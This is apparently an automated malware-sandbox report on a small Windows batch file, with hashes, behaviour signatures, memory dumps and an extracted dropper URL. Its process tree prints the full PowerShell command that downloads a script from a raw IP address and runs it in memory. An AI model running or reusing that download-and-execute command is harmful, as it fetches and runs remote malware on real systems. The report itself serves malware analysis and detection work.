Overview

overview

10

Static

static

9e35cd287a...b3.bat

windows7_x64

10

9e35cd287a...b3.bat

windows10_x64

10

Analysis

  • max time kernel
    132s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-08-2020 19:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9e35cd287a986dd3eab0fd5413dbbfb3.bat

  • Size

    215B

  • MD5

    d14242bd9a927a641dc49bf913b5b570

  • SHA1

    b031b26dd6d89c5672b9cb2f7fe66d650222a687

  • SHA256

    755c35484b2236919e799e05687ca2aff151593f39c9deee51c33f6f33c97c7a

  • SHA512

    ff13f23ffa4f9e0e568b9eb7aacfe9340d72e46dac773d51356b26b5323102c8d016f4c87ff6cb2d3d886961dd335382f37d88f27b6fac7264ae562079780ab0

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\9e35cd287a986dd3eab0fd5413dbbfb3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3');Invoke-GBFBFRLC;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1916

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1916-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1916-1-0x0000000074020000-0x000000007470E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1916-2-0x0000000000410000-0x0000000000411000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-3-0x0000000004B10000-0x0000000004B11000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-4-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-5-0x0000000002690000-0x0000000002691000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-8-0x0000000005600000-0x0000000005601000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-13-0x0000000005670000-0x0000000005671000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-14-0x00000000060F0000-0x00000000060F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-21-0x00000000062A0000-0x00000000062A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1916-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

    Download